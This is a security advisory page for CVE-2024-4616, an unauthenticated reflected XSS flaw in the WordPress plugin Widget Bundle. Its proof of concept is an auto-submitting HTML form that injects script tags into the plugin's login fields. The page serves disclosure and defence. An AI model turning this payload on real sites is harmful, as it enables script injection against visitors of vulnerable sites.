Widget Bundle <= 2.0.0 – Unauthencated Reflected XSS | CVE 2024-4616 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users

Proof of Concept

On a site with the User Login/Registration widget active, have an unauthenticated user send a post request to the any page where the widget appears:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com" method="post">
        <input type="hidden" name="login_username" value='"><script>alert(1)</script>' />
        <input type="hidden" name="login_password" value='"><script>alert(2)</script>' />
        <input type="hidden" name="widget_login_submit" value="Login" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

wp-widget-bundle

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

d203bf3b-aee9-4755-b429-d6bbdd940890

Timeline

Publicly Published

2024-05-31 (about 30 days ago)

Added

2024-05-31 (about 29 days ago)

Last Updated

2024-05-31 (about 29 days ago)

Other

Published

Title

Published

2023-06-19

Title

Float menu < 5.0.3 - Admin+ Stored Cross-Site Scripting

Published

2023-06-28

Title

WCP OpenWeather <= 2.5.0 - Reflected XSS

Published

2016-04-12

Title

MW Font Changer < 4.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Published

2024-05-14

Title

Visual Portfolio, Photo Gallery & Post Grid < 3.3.3 - Authenticated (Author+) Stored Cross-Site Scripting via title_tag Parameter

Published

2023-10-12

Title

WP 6.3-6.3.1 - Contributor+ Stored XSS via Footnotes Block